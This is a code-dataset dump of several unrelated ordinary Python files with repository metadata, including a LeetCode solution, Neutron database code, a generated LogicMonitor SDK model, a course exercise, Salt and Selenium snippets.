    def getEntries(self, path, metadata, events, seList, objStore):
        if self.stripPath and self.stripPath in path:
            yield (self.stripPath + path.split(self.stripPath, 1)[1], metadata, events, seList, objStore)
        else:
            yield (path, metadata, events, seList, objStore)


class FilterEDMFiles(InfoScanner):
    def getEntries(self, path, metadata, events, seList, objStore):
        if all(imap(lambda x: x in metadata, ['CMSSW_EVENTS_WRITE', 'CMSSW_CONFIG_FILE'])):
            yield (path, metadata, events, seList, objStore)
blob_id: 2672ebf95d24a74fd6bfb9c7ca5948697ef1cc80
directory_id: b3fa4bb31add76bbff0b6f864f433ff9af7897b6
path: /109.sortedListToBST.py
content_id: 751ed76c2ec1801eb87a6f002d30123f3f262fbb
detected_licenses: []
license_type: no_license
repo_name: Aissen-Li/LeetCode
snapshot_id: 7298225ba95d58194a5fc87c7ee3ef4d04ec4d4b
revision_id: f08628e3ce639d1e3f35a2bd3af14cc2b67d7249
branch_name: refs/heads/master
visit_date: 2020-12-30T08:03:17.277924
revision_date: 2020-09-25T08:20:53
committer_date: 2020-09-25T08:20:53
github_id: 238,919,619
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 834
extension: py
content:
# Definition for singly-linked list.
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None


# Definition for a binary tree node.
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution:
    def sortedListToBST(self, head: ListNode) -> TreeNode:
        slow, fast = head, head
        leftEnd = None
        while fast and fast.next:
            leftEnd = slow
            slow = slow.next
            fast = fast.next.next
        if head == slow:
            return TreeNode(slow.val)
        root = TreeNode(slow.val)
        if leftEnd:
            leftEnd.next = None
        rightStart = slow.next
        root.left = self.sortedListToBST(head)
        root.right = self.sortedListToBST(rightStart)
        return root
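A minimal usage sketch (list values assumed, not from the source): the sorted list 1 -> 2 -> 3 becomes a height-balanced BST rooted at the middle node.

# Usage sketch with assumed values: 1 -> 2 -> 3 yields a tree rooted at 2.
head = ListNode(1)
head.next = ListNode(2)
head.next.next = ListNode(3)
root = Solution().sortedListToBST(head)
print(root.val, root.left.val, root.right.val)  # 2 1 3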
blob_id: adf993aa0cb6b57623219bbff2eea82c09956c47
directory_id: dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1
path: /icehouse-patches/neutron/vlan2vlan/neutron/db/cascade_db.py
content_id: d3e520ea4be1bb85b014269fd52aa828589bc05c
detected_licenses: [ "Apache-2.0" ]
license_type: permissive
repo_name: joey5678/tricircle
snapshot_id: 40897fed8fe9d6772e8878b4f06ba1a829636488
revision_id: e211f7efef129bbfb038cc05232ea1de33f82a97
branch_name: refs/heads/master
visit_date: 2021-01-17T21:04:32.945469
revision_date: 2014-11-17T09:46:29
committer_date: 2014-11-17T10:10:07
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 6,542
extension: py
content:
'''
Created on 2014-8-5

@author: j00209498
'''
from oslo.db import exception as db_exc

import sqlalchemy as sa

from neutron.api.rpc.agentnotifiers import l3_rpc_agent_api
from neutron.common import exceptions as q_exc
from neutron.common import log
from neutron.common import utils
from neutron.db import model_base
from neutron.extensions import dvr as ext_dvr
from neutron import manager
from neutron.openstack.common import log as logging
from oslo.config import cfg
from sqlalchemy.orm import exc

LOG = logging.getLogger(__name__)

big2layer_vni_opts = [
    cfg.StrOpt('big2layer_vni_range',
               default="4097:20000",
               help=_('The big 2 layer vxlan vni range used for '
                      'CascadeDBMixin instances by Neutron')),
]
cfg.CONF.register_opts(big2layer_vni_opts)


class CascadeAZNetworkBinding(model_base.BASEV2):
    """Represents a v2 neutron distributed virtual router mac address."""

    __tablename__ = 'cascade_az_network_bind'

    network_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
    host = sa.Column(sa.String(255), primary_key=True, nullable=False)


class CascadeRouterAZExternipMapping(model_base.BASEV2):
    """Represents a v2 neutron distributed virtual router mac address."""

    __tablename__ = 'cascade_router_az_externip_map'

    router_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
    host = sa.Column(sa.String(255), primary_key=True, nullable=False)
    extern_ip = sa.Column(sa.String(64), nullable=False)


class CascadeDBMixin(object):

    @property
    def l3_rpc_notifier(self):
        if not hasattr(self, '_l3_rpc_notifier'):
            self._l3_rpc_notifier = l3_rpc_agent_api.L3AgentNotifyAPI()
        return self._l3_rpc_notifier

    def is_big2layer_vni(self, seg_id):
        vni = cfg.CONF.big2layer_vni_range.split(':')
        if(seg_id >= int(vni[0]) and seg_id <= int(vni[1])):
            return True
        else:
            return False

    def get_binding_az_by_network_id(self, context, net_id):
        try:
            query = context.session.query(CascadeAZNetworkBinding)
            ban = query.filter(
                CascadeAZNetworkBinding.network_id == net_id).one()
        except exc.NoResultFound:
            return None
        return ban['host']

    def add_binding_az_network_id(self, context, binding_host, net_id):
        try:
            with context.session.begin(subtransactions=True):
                dvr_mac_binding = CascadeAZNetworkBinding(
                    network_id=net_id, host=binding_host)
                context.session.add(dvr_mac_binding)
                LOG.debug("add az_host %(host)s for network %(network_id)s ",
                          {'host': binding_host, 'network_id': net_id})
        except db_exc.DBDuplicateEntry:
            LOG.debug("az_host %(host)s exists for network %(network_id)s,"
                      " DBDuplicateEntry error.",
                      {'host': binding_host, 'network_id': net_id})

    def get_extern_ip_by_router_id_and_host(self, context, router_id, host):
        rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
        if(rae):
            return rae['extern_ip']
        return None
        # try:
        #     query = context.session.query(CascadeRouterAZExternipMapping)
        #     erh = query.filter(
        #         CascadeRouterAZExternipMapping.router_id == router_id,
        #         CascadeRouterAZExternipMapping.host == host).one()
        # except exc.NoResultFound:
        #     return None
        # return erh['extern_ip']

    def get_router_az_extern_ip_mapping(self, context, router_id, host):
        try:
            query = context.session.query(CascadeRouterAZExternipMapping)
            erh = query.filter(
                CascadeRouterAZExternipMapping.router_id == router_id,
                CascadeRouterAZExternipMapping.host == host).one()
        except exc.NoResultFound:
            return None
        return erh

    def update_router_az_extern_ip_mapping(self, context, router_id,
                                           host, extern_ip):
        if extern_ip is None:
            self.del_router_az_extern_ip_mapping(context, router_id, host)
            self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                 None, None)
            return
        rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
        if(rae and rae['extern_ip'] != extern_ip):
            update_rae = {}
            update_rae['router_id'] = rae['router_id']
            update_rae['host'] = rae['host']
            update_rae['extern_ip'] = extern_ip
            rae.update(update_rae)
            LOG.debug("update extern_ip %(extern_ip)s for az_host %(host)s "
                      "and router %(router_id)s ",
                      {'extern_ip': extern_ip,
                       'host': host,
                       'network_id': router_id})
            self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                 None, None)
            return
        try:
            with context.session.begin(subtransactions=True):
                router_az_extern_ip_map = CascadeRouterAZExternipMapping(
                    router_id=router_id, host=host, extern_ip=extern_ip)
                context.session.add(router_az_extern_ip_map)
                LOG.debug("add extern_ip %(extern_ip)s for az_host %(host)s "
                          "and router %(router_id)s ",
                          {'extern_ip': extern_ip,
                           'host': host,
                           'network_id': router_id})
            self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                 None, None)
        except db_exc.DBDuplicateEntry:
            LOG.debug("DBDuplicateEntry ERR:update extern_ip %(extern_ip)s "
                      "for az_host %(host)s and router %(router_id)s ",
                      {'extern_ip': extern_ip,
                       'host': host,
                       'network_id': router_id})

    def del_router_az_extern_ip_mapping(self, context, router_id, host):
        try:
            query = context.session.query(CascadeRouterAZExternipMapping)
            query.filter(
                CascadeRouterAZExternipMapping.router_id == router_id,
                CascadeRouterAZExternipMapping.host == host).delete()
        except exc.NoResultFound:
            return None
blob_id: 64477cf64390abc1deb7e4438116f3e5da6528d1
directory_id: 0412893529999de784ab9cb914f385ba788a3684
path: /logicmonitor_sdk/models/unmonitored_devices.py
content_id: 8c2d586de6029d22e1ebdb104aec09fa77f40dc6
detected_licenses: [ "Apache-2.0" ]
license_type: permissive
repo_name: JeremyTangCD/lm-sdk-python
snapshot_id: 0326bf034c16b022b760600dc18fe7aaad42fa26
revision_id: 2a15e055e5a3f72d2f2e4fb43bdbed203c5a9983
branch_name: refs/heads/master
visit_date: 2020-04-15T15:39:59.276224
revision_date: 2019-01-09T09:55:36
committer_date: 2019-01-09T09:55:36
github_id: 164,803,314
star_events_count: 0
fork_events_count: 0
gha_license_id: Apache-2.0
gha_event_created_at: 2019-01-09T09:58:55
gha_created_at: 2019-01-09T06:33:40
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 15,888
extension: py
content:
# coding: utf-8 """ LogicMonitor REST API LogicMonitor is a SaaS-based performance monitoring platform that provides full visibility into complex, hybrid infrastructures, offering granular performance monitoring and actionable data and insights. logicmonitor_sdk enables you to manage your LogicMonitor account programmatically. # noqa: E501 OpenAPI spec version: 1.0.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class UnmonitoredDevices(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'device_type': 'str', 'nsp_id': 'int', 'forward_ip': 'str', 'end_date': 'str', 'ip': 'str', 'dns': 'str', 'collector_id': 'int', 'ports': 'str', 'nsp_name': 'str', 'device_status': 'str', 'manufacturer': 'str', 'collector_description': 'str', 'display_as': 'str', 'sys_name': 'str', 'nse_id': 'int', 'id': 'int', 'end_timestamp': 'int', 'status': 'str', 'nse_scan_id': 'str' } attribute_map = { 'device_type': 'deviceType', 'nsp_id': 'nspId', 'forward_ip': 'forwardIp', 'end_date': 'endDate', 'ip': 'ip', 'dns': 'dns', 'collector_id': 'collectorId', 'ports': 'ports', 'nsp_name': 'nspName', 'device_status': 'deviceStatus', 'manufacturer': 'manufacturer', 'collector_description': 'collectorDescription', 'display_as': 'displayAs', 'sys_name': 'sysName', 'nse_id': 'nseId', 'id': 'id', 'end_timestamp': 'endTimestamp', 'status': 'status', 'nse_scan_id': 'nseScanId' } def __init__(self, device_type=None, nsp_id=None, forward_ip=None, end_date=None, ip=None, dns=None, collector_id=None, ports=None, nsp_name=None, device_status=None, manufacturer=None, collector_description=None, display_as=None, sys_name=None, nse_id=None, id=None, end_timestamp=None, status=None, nse_scan_id=None): # noqa: E501 """UnmonitoredDevices - a model defined in Swagger""" # noqa: E501 self._device_type = None self._nsp_id = None self._forward_ip = None self._end_date = None self._ip = None self._dns = None self._collector_id = None self._ports = None self._nsp_name = None self._device_status = None self._manufacturer = None self._collector_description = None self._display_as = None self._sys_name = None self._nse_id = None self._id = None self._end_timestamp = None self._status = None self._nse_scan_id = None self.discriminator = None if device_type is not None: self.device_type = device_type if nsp_id is not None: self.nsp_id = nsp_id if forward_ip is not None: self.forward_ip = forward_ip if end_date is not None: self.end_date = end_date if ip is not None: self.ip = ip if dns is not None: self.dns = dns if collector_id is not None: self.collector_id = collector_id if ports is not None: self.ports = ports if nsp_name is not None: self.nsp_name = nsp_name if device_status is not None: self.device_status = device_status if manufacturer is not None: self.manufacturer = manufacturer if collector_description is not None: self.collector_description = collector_description if display_as is not None: self.display_as = display_as if sys_name is not None: self.sys_name = sys_name if nse_id is not None: self.nse_id = nse_id if id is not None: self.id = id if end_timestamp is not None: self.end_timestamp = end_timestamp if status is not None: self.status = status if nse_scan_id is not None: self.nse_scan_id = 
nse_scan_id @property def device_type(self): """Gets the device_type of this UnmonitoredDevices. # noqa: E501 :return: The device_type of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._device_type @device_type.setter def device_type(self, device_type): """Sets the device_type of this UnmonitoredDevices. :param device_type: The device_type of this UnmonitoredDevices. # noqa: E501 :type: str """ self._device_type = device_type @property def nsp_id(self): """Gets the nsp_id of this UnmonitoredDevices. # noqa: E501 :return: The nsp_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._nsp_id @nsp_id.setter def nsp_id(self, nsp_id): """Sets the nsp_id of this UnmonitoredDevices. :param nsp_id: The nsp_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._nsp_id = nsp_id @property def forward_ip(self): """Gets the forward_ip of this UnmonitoredDevices. # noqa: E501 :return: The forward_ip of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._forward_ip @forward_ip.setter def forward_ip(self, forward_ip): """Sets the forward_ip of this UnmonitoredDevices. :param forward_ip: The forward_ip of this UnmonitoredDevices. # noqa: E501 :type: str """ self._forward_ip = forward_ip @property def end_date(self): """Gets the end_date of this UnmonitoredDevices. # noqa: E501 :return: The end_date of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._end_date @end_date.setter def end_date(self, end_date): """Sets the end_date of this UnmonitoredDevices. :param end_date: The end_date of this UnmonitoredDevices. # noqa: E501 :type: str """ self._end_date = end_date @property def ip(self): """Gets the ip of this UnmonitoredDevices. # noqa: E501 :return: The ip of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._ip @ip.setter def ip(self, ip): """Sets the ip of this UnmonitoredDevices. :param ip: The ip of this UnmonitoredDevices. # noqa: E501 :type: str """ self._ip = ip @property def dns(self): """Gets the dns of this UnmonitoredDevices. # noqa: E501 :return: The dns of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._dns @dns.setter def dns(self, dns): """Sets the dns of this UnmonitoredDevices. :param dns: The dns of this UnmonitoredDevices. # noqa: E501 :type: str """ self._dns = dns @property def collector_id(self): """Gets the collector_id of this UnmonitoredDevices. # noqa: E501 :return: The collector_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._collector_id @collector_id.setter def collector_id(self, collector_id): """Sets the collector_id of this UnmonitoredDevices. :param collector_id: The collector_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._collector_id = collector_id @property def ports(self): """Gets the ports of this UnmonitoredDevices. # noqa: E501 :return: The ports of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._ports @ports.setter def ports(self, ports): """Sets the ports of this UnmonitoredDevices. :param ports: The ports of this UnmonitoredDevices. # noqa: E501 :type: str """ self._ports = ports @property def nsp_name(self): """Gets the nsp_name of this UnmonitoredDevices. # noqa: E501 :return: The nsp_name of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._nsp_name @nsp_name.setter def nsp_name(self, nsp_name): """Sets the nsp_name of this UnmonitoredDevices. :param nsp_name: The nsp_name of this UnmonitoredDevices. 
# noqa: E501 :type: str """ self._nsp_name = nsp_name @property def device_status(self): """Gets the device_status of this UnmonitoredDevices. # noqa: E501 :return: The device_status of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._device_status @device_status.setter def device_status(self, device_status): """Sets the device_status of this UnmonitoredDevices. :param device_status: The device_status of this UnmonitoredDevices. # noqa: E501 :type: str """ self._device_status = device_status @property def manufacturer(self): """Gets the manufacturer of this UnmonitoredDevices. # noqa: E501 :return: The manufacturer of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._manufacturer @manufacturer.setter def manufacturer(self, manufacturer): """Sets the manufacturer of this UnmonitoredDevices. :param manufacturer: The manufacturer of this UnmonitoredDevices. # noqa: E501 :type: str """ self._manufacturer = manufacturer @property def collector_description(self): """Gets the collector_description of this UnmonitoredDevices. # noqa: E501 :return: The collector_description of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._collector_description @collector_description.setter def collector_description(self, collector_description): """Sets the collector_description of this UnmonitoredDevices. :param collector_description: The collector_description of this UnmonitoredDevices. # noqa: E501 :type: str """ self._collector_description = collector_description @property def display_as(self): """Gets the display_as of this UnmonitoredDevices. # noqa: E501 :return: The display_as of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._display_as @display_as.setter def display_as(self, display_as): """Sets the display_as of this UnmonitoredDevices. :param display_as: The display_as of this UnmonitoredDevices. # noqa: E501 :type: str """ self._display_as = display_as @property def sys_name(self): """Gets the sys_name of this UnmonitoredDevices. # noqa: E501 :return: The sys_name of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._sys_name @sys_name.setter def sys_name(self, sys_name): """Sets the sys_name of this UnmonitoredDevices. :param sys_name: The sys_name of this UnmonitoredDevices. # noqa: E501 :type: str """ self._sys_name = sys_name @property def nse_id(self): """Gets the nse_id of this UnmonitoredDevices. # noqa: E501 :return: The nse_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._nse_id @nse_id.setter def nse_id(self, nse_id): """Sets the nse_id of this UnmonitoredDevices. :param nse_id: The nse_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._nse_id = nse_id @property def id(self): """Gets the id of this UnmonitoredDevices. # noqa: E501 :return: The id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._id @id.setter def id(self, id): """Sets the id of this UnmonitoredDevices. :param id: The id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._id = id @property def end_timestamp(self): """Gets the end_timestamp of this UnmonitoredDevices. # noqa: E501 :return: The end_timestamp of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._end_timestamp @end_timestamp.setter def end_timestamp(self, end_timestamp): """Sets the end_timestamp of this UnmonitoredDevices. :param end_timestamp: The end_timestamp of this UnmonitoredDevices. 
# noqa: E501 :type: int """ self._end_timestamp = end_timestamp @property def status(self): """Gets the status of this UnmonitoredDevices. # noqa: E501 :return: The status of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._status @status.setter def status(self, status): """Sets the status of this UnmonitoredDevices. :param status: The status of this UnmonitoredDevices. # noqa: E501 :type: str """ self._status = status @property def nse_scan_id(self): """Gets the nse_scan_id of this UnmonitoredDevices. # noqa: E501 :return: The nse_scan_id of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._nse_scan_id @nse_scan_id.setter def nse_scan_id(self, nse_scan_id): """Sets the nse_scan_id of this UnmonitoredDevices. :param nse_scan_id: The nse_scan_id of this UnmonitoredDevices. # noqa: E501 :type: str """ self._nse_scan_id = nse_scan_id def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(UnmonitoredDevices, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, UnmonitoredDevices): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
blob_id: ca537def844347b897bbf7d508e7ed1b36881424
directory_id: 5d6fa3466d9fa8bd6719c6dea586163d3d089090
path: /codes/CHAPTER_3/Chapter_3.5_Error_Handling/Lesson_3/3.5.3_TryExcept2.py
content_id: 7dddad2dacf6be45dfd851d778977a7fca8af2a4
detected_licenses: []
license_type: no_license
repo_name: harveylabis/GTx_CS1301
snapshot_id: cff0c1a076b1da73c66d53175330b4dedc244163
revision_id: f26a5e9c4b8c29acb831444cd59d21524267825c
branch_name: refs/heads/master
visit_date: 2023-06-26T14:44:38.976288
revision_date: 2021-08-02T04:20:31
committer_date: 2021-08-02T04:20:31
github_id: 269,361,753
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 597
extension: py
content:
mystery_value = 9

#You may modify the lines of code above, but don't move them!
#When you Submit your code, we'll change these lines to
#assign different values to the variables.

#Create a program that divides 10 by mystery_value and prints
#the result. In the case that mystery_value is equal to 0,
#print "Not possible". Do not catch any other errors. This
#means there will be an uncaught error in the correct answer!
#
#You may not use any conditionals or the type() function.

#Add your code here!
try:
    print(10/mystery_value)
except ZeroDivisionError:
    print("Not possible")
blob_id: 9077243272380d510bf5f7fc9d920155d1ce0b61
directory_id: 239c34e56a2b586ae6618c1ccbba7e668a28fc6d
path: /salt/runners/error.py
content_id: 9bffab178e87891343acebb2e20fbfef0018b68f
detected_licenses: [ "Apache-2.0", "BSD-2-Clause", "MIT" ]
license_type: permissive
repo_name: georgiou/salt
snapshot_id: 076ce8e62289910af960f8e45ab8c3e0131943f2
revision_id: 4a3b930e4f2a8bfcdd9d18c3fef9cb1eb806a3f5
branch_name: refs/heads/develop
visit_date: 2023-09-03T10:39:01.309513
revision_date: 2014-03-07T15:49:29
committer_date: 2014-03-07T15:49:29
github_id: 17,520,119
star_events_count: 0
fork_events_count: 0
gha_license_id: NOASSERTION
gha_event_created_at: 2023-09-06T17:29:01
gha_created_at: 2014-03-07T16:32:38
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 616
extension: py
content:
# -*- coding: utf-8 -*-
'''
Error generator to enable integration testing of salt runner error handling
'''

# Import python libs

# Import salt libs
import salt.utils.error


def error(name=None, message=''):
    '''
    If name is None
    Then return empty dict
    Otherwise
    Raise an exception with __name__ from name, message from message

    CLI Example:

    .. code-block:: bash

        salt-run error
        salt-run error.error name="Exception" message="This is an error."
    '''
    ret = {}
    if name is not None:
        salt.utils.error.raise_error(name=name, message=message)
    return ret
blob_id: c0413f4a1638ff5d986ce54f0cb09762125edb75
directory_id: c5b9c54492cdf591a2190364e7bfb1041b63c218
path: /Selenium_pratice/PRATICE.py
content_id: 0aa9ed5795198786069df71cfd606f54389195ae
detected_licenses: []
license_type: no_license
repo_name: QAvinod/Interview_Question_Examples
snapshot_id: 43f7fb46f497415a8b30a8c6c5f13d2cbf6055b4
revision_id: f4f6d2c4e4fcc536de5656db30021f416959cce8
branch_name: refs/heads/master
visit_date: 2023-06-13T04:18:12.218130
revision_date: 2021-07-06T10:29:10
committer_date: 2021-07-06T10:29:10
github_id: 331,185,419
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 488
extension: py
content:
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.service import Service


def xpath_types():
    a = 1
    service = Service(executable_path=ChromeDriverManager().install())
    opt = webdriver.ChromeOptions()
    opt.add_argument("--start-maximized")
    driver = webdriver.Chrome(service=service, options=opt)
    driver.get('https://www.amazon.in/')
    assert a == 1


if __name__ == '__main__':
    xpath_types()
authors: [ "Vinod-E" ]
author_id: Vinod-E
blob_id: a38cbb263b8e8f152f0c49822ead89c1c46ab177
directory_id: 551ef0567aca428a535775d3949f5d9670c0d29c
path: /arc/arc003/b/main.py
content_id: a12ea26e888cccfd2ec1bc149e4cebdf993c7f4b
detected_licenses: []
license_type: no_license
repo_name: komo-fr/AtCoder
snapshot_id: 7451a9402466ce8d487d0c521128732061c647df
revision_id: c916889294cb12f21e74254de43b3e17e1b354bc
branch_name: refs/heads/master
visit_date: 2023-07-22T07:05:52.955188
revision_date: 2023-03-01T14:22:16
committer_date: 2023-03-01T14:22:16
github_id: 213,109,943
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: 2023-07-06T22:01:28
gha_created_at: 2019-10-06T04:44:49
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 201
extension: py
content:
#!/usr/bin/env python3
N = int(input().split()[0])

s_list = []
for _ in range(N):
    s = input()
    s = s[::-1]
    s_list.append(s)

ans = "\n".join([s[::-1] for s in sorted(s_list)])
print(ans)
blob_id: 7367eeebaef104b7ba3efa04c721a5f60349632d
directory_id: 7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
path: /packages/autorest.python/test/vanilla/legacy/Expected/AcceptanceTests/ClientEnum/clientenum/_vendor.py
content_id: 3b000a3b496306b693b088034c588b9e6b4b3a76
detected_licenses: [ "LicenseRef-scancode-generic-cla", "MIT" ]
license_type: permissive
repo_name: Azure/autorest.python
snapshot_id: cc4bfbf91ae11535731cad37cedd6b733edf1ebd
revision_id: a00d7aaa3753ef05cb5a0d38c664a90869478d44
branch_name: refs/heads/main
visit_date: 2023-09-03T06:58:44.246200
revision_date: 2023-08-31T20:11:51
committer_date: 2023-08-31T20:11:51
github_id: 100,315,955
star_events_count: 47
fork_events_count: 40
gha_license_id: MIT
gha_event_created_at: 2023-09-14T21:00:21
gha_created_at: 2017-08-14T22:58:33
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,302
extension: py
content:
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from abc import ABC
from typing import TYPE_CHECKING

from azure.core.pipeline.transport import HttpRequest

from ._configuration import ClientWithEnumConfiguration

if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from azure.core import PipelineClient

    from ._serialization import Deserializer, Serializer


def _convert_request(request, files=None):
    data = request.content if not files else None
    request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data)
    if files:
        request.set_formdata_body(files)
    return request


class ClientWithEnumMixinABC(ABC):
    """DO NOT use this class. It is for internal typing use only."""

    _client: "PipelineClient"
    _config: ClientWithEnumConfiguration
    _serialize: "Serializer"
    _deserialize: "Deserializer"
blob_id: ee35ec61d28c96933eeefced4425bbb07e904ab5
directory_id: c27862cc24513c1d1c221e07c261b9fe65a37f54
path: /logging_moudle/A_test.py
content_id: 50b540b5b19a23cdb07ccb383f965a24b6193b9c
detected_licenses: []
license_type: no_license
repo_name: MannixZ/Mannix
snapshot_id: ac62ef29c1dcbb513b121ad9d42db851103884fc
revision_id: 7b86d0a619e0d6e3eecb94331ee60d89542b99f2
branch_name: refs/heads/master
visit_date: 2020-05-26T13:27:24.979334
revision_date: 2019-05-23T14:10:47
committer_date: 2019-05-23T14:10:47
github_id: 164,109,199
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 385
extension: py
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging

from logging_moudle.main import setup_logging

# logger = logging.getLogger('main.A_test')


def compler():
    a = 3
    b = 2
    if a > b:
        logging.info("++++++%s %s", a, b)


def hahaha():
    logging.info('__________')


if __name__ == '__main__':
    setup_logging()
    compler()
    hahaha()
blob_id: 13f6ebcb96f77e6bd120053c29a06acd5afdee72
directory_id: f513c794fd95cb72ee776029ece38a08c4b4da0b
path: /corehq/apps/cleanup/management/commands/reprocess_error_forms.py
content_id: efe1b59229228cce7b52b8ed4af54578c3020968
detected_licenses: []
license_type: no_license
repo_name: bglar/commcare-hq
snapshot_id: a92f034a0c2faf787da8321b4d79e55f098bd89f
revision_id: 972129fc26864c08c7bef07874bd2a7218550bff
branch_name: refs/heads/master
visit_date: 2021-05-28T20:44:12.876151
revision_date: 2015-01-16T16:23:52
committer_date: 2015-01-16T16:23:52
github_id: 29,391,363
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,217
extension: py
content:
# Note: Python 2 code (print statements and the old `except Exception, e` syntax).
from collections import defaultdict
from django.core.management.base import BaseCommand, CommandError, LabelCommand
from casexml.apps.case.util import reprocess_form_cases
from corehq.apps.cleanup.xforms import iter_problem_forms
from optparse import make_option

from dimagi.utils.parsing import string_to_datetime


class Command(BaseCommand):
    args = '<domain> <since>'
    help = ('Reprocesses all documents tagged as errors and tries to '
            'regenerate the appropriate case blocks for them. Can pass in '
            'a domain and date to process forms received after that date or '
            'just a domain to process all problem forms in the domain.')

    option_list = LabelCommand.option_list + \
        (make_option('--dryrun', action='store_true', dest='dryrun', default=False,
                     help="Don't do the actual reprocessing, just print the ids that would be affected"),)

    def handle(self, *args, **options):
        domain = since = None
        if len(args) == 1:
            domain = args[0]
        elif len(args) == 2:
            domain = args[0]
            since = string_to_datetime(args[1])
        else:
            raise CommandError('Usage: %s\n%s' % (self.args, self.help))

        succeeded = []
        failed = []
        error_messages = defaultdict(lambda: 0)
        for form in iter_problem_forms(domain, since):
            print "%s\t%s\t%s\t%s\t%s" % (form._id, form.received_on, form.xmlns,
                                          form.xpath('form/meta/username'), form.problem.strip())
            if not options["dryrun"]:
                try:
                    reprocess_form_cases(form)
                except Exception, e:
                    failed.append(form._id)
                    error_messages[str(e)] += 1
                else:
                    succeeded.append(form._id)

        print "%s / %s forms successfully processed, %s failures" % \
            (len(succeeded), len(succeeded) + len(failed), len(failed))
        if error_messages:
            print "The following errors were seen: \n%s" % \
                ("\n".join("%s: %s" % (v, k) for k, v in error_messages.items()))
blob_id: ed04c0cece483566e3d392dbc7e8b59f228424c2
directory_id: bd37e10ba5aa2e241c82c0f707e832e2d2c98448
path: /delivery_app/administrators/apps.py
content_id: 41d1adfdf06d8d58d39eb0047eb6dcb2c11de41e
detected_licenses: []
license_type: no_license
repo_name: DmitriyBul/DimkaDeliveryApp
snapshot_id: 9d88aaf733fee5345fe1ff0ca4a83242b3ca73c4
revision_id: 22fe0229bbd17e978bdc279751e41c98584a0e44
